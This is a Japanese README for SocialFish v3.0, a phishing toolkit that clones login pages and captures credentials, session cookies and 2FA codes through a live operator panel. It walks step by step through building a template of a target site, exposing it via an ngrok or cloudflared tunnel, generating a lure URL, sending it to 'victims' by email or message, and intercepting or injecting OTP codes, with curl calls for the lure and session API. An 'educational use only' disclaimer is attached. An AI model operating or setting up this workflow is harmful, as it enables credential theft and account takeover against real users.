
認定されたレッドチーム演習のための最新の動的フィッシングツールキット。ログインページをクローンし、資格情報、クッキー、2FAコードを取得します。ライブオペレータパネルとトンネリングサポートを備えています。
SocialFish v3.0 は、最新のログインページのクローン作成、クッキーの取得、2FAコードの傍受をライブオペレーターパネルで実現する強力な新機能をもたらします。
python setup.py
これにより:
pip install -r requirements.txt
playwright install chromium
python SocialFish.py admin password
その後、以下にアクセス:http://localhost:5000/neptune
テンプレートを作成
/templates → 新規テンプレート → ターゲットURLを入力
トンネルを設定(リモートテスト用、任意)
「トンネル」をクリック → ngrok/cloudflaredを選択 → 承認
誘導URLを生成
「誘導」をクリック → 推測不能なURLをコピー
被害者に送信
メールやメッセージなどで誘導URLを配布
リアルタイムで監視
/sessions → 取得した認証情報、クッキー、OTPコードを表示
/admin/otp_panel.html → 2FAコードを傍受・注入
both(認証情報+クッキー)、login(認証情報のみ)、cookies(セッションのみ)以下のログインページで動作:
# テンプレート一覧
curl http://localhost:5000/templates
# 誘導URLの生成
curl -X POST http://localhost:5000/lure/generate \
-d "template_id=1"
# セッションの表示
curl http://localhost:5000/session/1
# セットアップ
python setup.py # 対話型セットアップ
# トンネリング
python core/tunnel_manager.py setup
python core/tunnel_manager.py start --type ngrok
# データベース
python core/db_migration.py
SocialFish/
├── SocialFish.py # メインFlaskアプリ
├── setup.py # 対話型セットアップウィザード
├── FEATURES_v3.md # 機能ドキュメント
├── IMPLEMENTATION_SUMMARY.md # 技術的詳細
├── core/
│ ├── recorder_playwright.py # ブラウザ自動化
│ ├── cookie_inspector.py # クッキー分析
│ ├── tunnel_manager.py # トンネリングサポート
│ ├── db_migration.py # データベーススキーマ
│ └── ... (その他のモジュール)
└── templates/
└── admin/
├── templates.html # テンプレートライブラリUI
├── otp_panel.html # OTP傍受UI
├── sessions.html # セッション管理UI
└── ... (その他のテンプレート)
⚠️ 教育目的のみ
詳細については、CODE_OF_CONDUCT.md および LICENSE を参照してください。
モバイルコントローラーをお探しの場合は、SocialFishMobile をご覧ください。
教育目的でのみ使用すること
SocialFishの使用は、エンドユーザーの完全な責任です。開発者は一切の責任を負わず、このプログラムの誤用または損害について一切の責任を負いません。
「免責条項。いかなる場合においても、著作権者または貢献者は、直接、間接、偶発的、特別、懲罰的、または結果的損害(代替品またはサービスの調達、使用、データ、または利益の喪失、または事業の中断を含むがこれに限定されない)について、契約、厳格責任、または不法行為(過失を含む)に基づくいかなる責任理論においても、本ソフトウェアの使用から生じるいかなる損害についても責任を負わないものとします。そのような損害の可能性について事前に通知されていた場合も同様とします。」
LICENSE より引用。
Dockerで実行する場合:
docker compose up
ステータス:権限のあるセキュリティテストおよびレッドチーム演習向けのプロダクションレディ
SocialFishへの貢献を歓迎します!進め方については、Contributing to SocialFish ガイドをご確認ください。ぜひご参加ください!
@carinamary2448 - https://github.com/carinamary2448